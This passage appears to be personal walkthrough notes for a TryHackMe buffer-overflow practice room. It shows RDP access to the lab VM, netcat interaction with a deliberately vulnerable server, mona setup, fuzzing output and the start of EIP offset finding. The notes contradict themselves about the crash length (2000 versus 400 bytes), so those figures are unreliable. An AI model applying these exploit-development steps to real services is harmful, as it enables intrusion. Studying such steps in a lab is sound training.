https://tryhackme.com/room/bufferoverflowprep

Pwned Date -

Task 1 - Deploy VM

rdesktop ipaddress -u admin -p password -g 95% -5 -K -r clipboard:PRIMARYCLIPBOARD

Here are some info about the flags:

-g: desktop geometry (WxH[@DPI][+X[+Y]])
-5: use RDP version 5 (default)
-K: keep window manager key bindings
-r clipboard:[off|PRIMARYCLIPBOARD|CLIPBOARD]': enable clipboard

Task 2 - OVERFLOW2

Open the Immunity Debugger as Administrator, then press F9 to run it. On our kali machine:

┌──(kali㉿kali)-[~]
└─$ **nc ip_address 1337**
Welcome to OSCP Vulnerable Server! Enter HELP for help.
**HELP**
Valid Commands:
HELP
OVERFLOW1 [value]
OVERFLOW2 [value]
OVERFLOW3 [value]
OVERFLOW4 [value]
OVERFLOW5 [value]
OVERFLOW6 [value]
OVERFLOW7 [value]
OVERFLOW8 [value]
OVERFLOW9 [value]
OVERFLOW10 [value]
EXIT
**OVERFLOW1 test**
OVERFLOW1 COMPLETE

Mona Configuration

Locate our mona scripts if its not preinstalled:

!mona config -set workingfolder c:\\mona\\%p

Fuzzing

• Then create a file called 1-fuzzer.py on our kali machine

Run the fuzzer to get the crash value

┌──(kali㉿kali)-[~/OSCP-BoF-Prep]
└─$ python3 fuzzer.py 
Fuzzing with 100 bytes
Fuzzing with 200 bytes

<...SNIPPET...>

Fuzzing with 2000 bytes
Fuzzing crashed at 2000 bytes

Expected we should get something like EIP 41414141 on the Registers tab.

Crash Replication & Controlling EIP

• Create aother file called 2-find-offset.py on our kali machine

We will then use the following command to generate a cyclic pattern of a length 400 bytes longer that the string that crashed the server.

From our case above we crashed at 400 so we will put 2400 in this case.

Copy the output and place it into the payload variable of the exploit.py script.